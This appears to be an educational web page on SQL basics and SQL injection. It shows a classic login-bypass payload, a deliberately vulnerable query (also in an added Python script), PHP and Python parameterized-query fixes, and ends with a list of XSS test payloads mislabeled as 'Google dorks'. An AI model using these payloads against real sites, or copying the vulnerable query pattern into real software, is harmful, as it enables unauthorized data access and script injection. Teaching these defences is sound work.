What is SQL Injection? (simple definition)
SQL Injection (SQLi) is a malicious technique wherein attackers exploit vulnerabilities in a web application’s input validation mechanisms to inject SQL code into the database queries. By manipulating user inputs, hackers can gain unauthorized access to databases, extract sensitive information, or even manipulate and delete data. Effective prevention involves robust input validation and parameterized queries to thwart these attacks and enhance overall cybersecurity.
Basic SQL Operations: Usage
Command -> Usage
INSERT -> Input
UPDATE -> Modify
RETRIEVE -> Fetch
DELETE -> Remove
FILTER -> Need
SORT -> Arrange
ADDING -> Add
CREATE -> New table
JOIN -> Integrate / Merge
SQL Queries
1. SELECT: Retrieve the data from a database
SYNTAX:
SELECT column_name
FROM table_name
2. UPDATE: Update data in the database
SYNTAX:
UPDATE table_name
SET column_name = new_value
WHERE condition
The syntax for an SQL SELECT statement is as follows:
SELECT column1, column2, ... FROM table_name WHERE condition
- column1, column2, ... are the names of the columns to be retrieved from the table.
- table_name is the name of the table from which to retrieve data.
- WHERE is an optional clause that specifies the conditions that must be met for the rows to be selected.
- condition is the expression that defines the conditions for the rows to be selected.
For example, the following SQL statement retrieves all columns from the “customers” table where the “age” column is greater than or equal to 18:
SELECT * FROM customers WHERE age >= 18;
Demonstration On SQL Injections
-- This is an example of a SQL injection attack.
-- The following query is vulnerable to SQL injection:
SELECT * FROM users WHERE username = '$username';
-- An attacker can manipulate the $username variable to inject malicious SQL code, for example by submitting:
--   admin' OR '1'='1
-- This would result in the SQL query being:
SELECT * FROM users WHERE username = 'admin' OR '1'='1';
-- This would return all users from the database, including the admin user.
-- To prevent SQL injection, you should use parameterized queries or prepared statements.
The following code demonstrates how to use parameterized queries in PHP:
// Using PDO to prepare and execute a parameterized query
$pdo = new PDO('mysql:host=localhost;dbname=test', 'username', 'password');
// The ? placeholder marks where the value goes; the SQL text itself never changes
$stmt = $pdo->prepare('SELECT * FROM users WHERE username = ?');
$username = 'admin'; // This could be user input
// The value is bound to the placeholder at execution time
$stmt->execute([$username]);
$users = $stmt->fetchAll();
This code ensures that the $username variable is treated as a parameter, not as part of the SQL query string, which prevents SQL injection.
How can I use an SQL UPDATE statement to update data in a specific column of a table?
To update a specific column in a table using SQL, you can use the UPDATE statement with the desired column and the new value, along with a WHERE clause to specify the rows to be updated. For example, to update the first_name column for a customer with ID 123 to "Tom", you would use the following SQL statement:
UPDATE Customers
SET first_name = 'Tom'
WHERE id = 123;
This statement will update only the row where the id column is equal to 123.
If you want to update multiple columns, you can include multiple assignments in the SET clause, but you still need a WHERE clause to specify the rows to be updated.
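The injection demonstration, the parameterized query and the UPDATE statement above, combined into one runnable added example (not code from the original page). It uses Python's sqlite3 with an in-memory database so it runs without a MySQL server; the users table, its rows and the function names are constructed for illustration.

```python
import sqlite3

def make_db():
    """Build an in-memory database with constructed sample rows."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, first_name TEXT)"
    )
    db.executemany(
        "INSERT INTO users (id, username, first_name) VALUES (?, ?, ?)",
        [(1, "admin", "Ada"), (2, "bob", "Bob"), (123, "o'brien", "Tim")],
    )
    return db

def find_user_vulnerable(db, username):
    # Vulnerable: the input is pasted into the SQL text, like '$username'
    # in the query above, so a quote in the input changes the query itself.
    query = "SELECT id, username FROM users WHERE username = '" + username + "'"
    return db.execute(query).fetchall()

def find_user_safe(db, username):
    # Parameterized: the value is bound to ? and never parsed as SQL.
    return db.execute(
        "SELECT id, username FROM users WHERE username = ?", (username,)
    ).fetchall()

def rename_user_safe(db, user_id, first_name):
    # Parameterized UPDATE; the WHERE clause limits the change to one row.
    cur = db.execute(
        "UPDATE users SET first_name = ? WHERE id = ?", (first_name, user_id)
    )
    return cur.rowcount  # number of rows actually changed

if __name__ == "__main__":
    db = make_db()
    payload = "admin' OR '1'='1"  # the input shown in the demonstration
    print("vulnerable:", find_user_vulnerable(db, payload))
    print("parameterized:", find_user_safe(db, payload))
    try:
        # A legitimate name with an apostrophe breaks the concatenated query.
        find_user_vulnerable(db, "o'brien")
    except sqlite3.OperationalError as exc:
        print("vulnerable query fails on o'brien:", exc)
    print("parameterized:", find_user_safe(db, "o'brien"))
    print("rows updated:", rename_user_safe(db, 123, "Tom"))
```

The concatenated query returns every row for the crafted input and raises a syntax error for a legitimate name containing an apostrophe, while the parameterized versions handle both as plain data.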
Some Google dorks here:
<script>alert(123);</script>
<ScRipT>alert("XSS");</ScRipT>
<script>alert(123)</script>
<script>alert("hellox worldss");</script>
<script>alert('XSS')</script>
<script>alert('XSS');</script>
'><script>alert('XSS')</script>
<script>alert(/XSS/)</script>
</script><script>alert(1)</script>
'; alert(1);
')alert(1);//
<ScRiPt>alert(1)</sCriPt>
<IMG SRC=jAVasCrIPt:alert('XSS')>
<IMG SRC='javascript:alert('XSS');'>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=javascript:alert('XSS')>
<img src=xss onerror=alert(1)>